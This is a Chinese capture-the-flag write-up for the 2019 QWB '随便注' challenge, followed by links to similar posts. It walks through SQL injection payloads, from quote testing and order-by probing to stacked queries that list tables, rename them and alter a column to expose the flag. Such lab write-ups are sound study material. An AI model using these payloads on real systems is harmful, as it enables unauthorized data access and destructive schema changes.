强网杯 2019-随便注 (堆叠注入)
1'
所以是单引号闭合
1' or 1#
查出了表中的全部数据
1' order by 3#
所以字段数为2
1' union select 1,2#
return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);
发现过滤了很多关键字,所以不可以用union注入了。同样报错注入也是用不了的,因为报错注入的语句和union注入的语句相同。
使用堆叠注入
1';show databases;#
1';show tables;#
1';show columns from `1919810931114514`;#
我们查看数字表,反单引号(`)是数据库、表、索引、列和别名用的引用符,如果是纯数字的表就需要加反单引号,如果不是就不需要加或者加上也无所谓。
1';show columns from words;#
看到words表中的字段,我们发现底层的sql语句就是直接查询的words表
select * from words where id=$inject limit 0,1;
但是我们现在的flag在数字表中,并且过滤了很多关键字,我们无法直接查询数字表
我们通过rename或alter,就是把words表改成words1或者其他名字,然后把数字表名改成words,然后在把新的words里面的flag字段名称修改成id
1';rename table words to words2;rename table `1919810931114514` to words;alter table words change flag id varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;desc words;#
1' or 1#
强网杯 2019-随便注 (堆叠注入)相关推荐
- [强网杯 2019]随便注 —— 堆叠注入
[强网杯 2019]随便注 前言 个人观点,若有误请指教 解题思路及步骤 直接上'引号,结果直接报错了,证明存在sql注入漏洞. 判断当前表 ...
- 强网杯 2019]随便注 【SQL注入】四种解法
题目简介 题目名称:[强网杯 2019]随便注 1 题目平台:BUUCTF 题目类型:Web 考察知识点: SQL注入 解题步骤 方法一: 首先启动并访问靶机,有一个输入框,随便输入1' or 1 = ...
- BUUCTF Web [强网杯 2019]随便注
「作者主页」:士别三日wyx 此文章已录入专栏<网络攻防>,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之 ...
- [强网杯 2019]随便注 1
题目[强网杯 2019]随便注 1 题目来源:https://buuoj.cn/challenges#[%E5%BC%BA%E7%BD%91%E6%9D%AF%202019]%E9%9A%8F%E4% ...
- buuctf [强网杯 2019]随便注 1
buuctf web [强网杯 2019]随便注 1 -刷题个人日记 小白一个,写给自己看. 打开后是这样. 从题目和内容来看就是一道sql注入题. 输入 1' or 1=1;# 这个#用来注释掉后面 ...
- BMZCTF 强网杯 2019 随便注 原理+题解
目录 知识点 堆叠注入 show语句 mysql预编译 过程 重点 预编译 重命名 总结 知识点 堆叠注入 堆叠查询注入:堆叠查询可以执行多条SQL语句,语句之间以分号(;)隔开.而堆叠查询注入攻击就 ...
- BUUCTF [强网杯 2019]随便注
题目 打开环境发现是经典的提交界面 老规则还是查询注入点,1 or 1 =1#,1' order by 1#都未出错,但是1' union select 1,2#是出现了错误,发现一些查询语句被过滤了 ...
- 堆叠注入-强网杯2019随便注
靶场地址 链接(click me) 发现很友情的提示,emmm,那就先使用不同的 payload 进行测试,看下结果吧 直接点击提交,看结果,输出为一个数组,此处应有文章可做,再测试其他payload ...
- [强网杯 2019]随便注 1【SQL注入】解析过程
1.首先启动并访问靶机,有一个输入框,随便输入1' or 1 = 1,测试一下是否存在sql注入. 2.提交后提示error 1064 : You have an error in your SQL ...
- (二)强网杯2019[随便注]
堆叠注入学习(堆叠查询,Stacked Queries) 堆叠注入为攻击者提供了很多控制权,与仅限于SELECT语句的UNION联合查询攻击不同,堆叠注入可以用于执行任何SQL语句. 堆叠注入原理 在 ...
最新文章
- 人工智能与制造业融合有多难?我国人工智能人才缺口达30万
- GitHub NetFlow
- jupyter notebook界面颜色jt_更改jupyter notebook主题颜色——步骤详解(Windows系统)...
- Java IO 之 SequenceInputStream 原理解析
- iphone网络交互json实现
- centos7 禁止ip访问_centos7.6版本限制某个IP访问指定端口
- 使用Log4jdbc记录JDBC操作
- 计算机测试怎么提交,Win7电脑怎么测试上传速度?
- 使用ant自动生成签名的apk
- LeedCode篇:876. 链表的中间结点
- 线程放弃 java 1615477619
- SAP License:SAP实施应该建立扁平化组织结构
- 青蛙跳台阶问题暨斐波那契数列
- python开新窗口的方法_python tkinter点击按钮打开新窗口
- 计算机储存单元中的储存的内容是什么,什么是存储单元的地址?什么是存储单元的内容?...
- 关于python3.9安装Airtest跑脚本“jinja2”报错的问题说明
- 使用Core Graphics绘画一个山寨微信icon
- appium重启报错:Could not proxy command to the remote server. Original error: socket hang up
- python 基本知识总结1
- 大数据平台Ambari2.7.4+HDP3.1.4安装(超详细教程)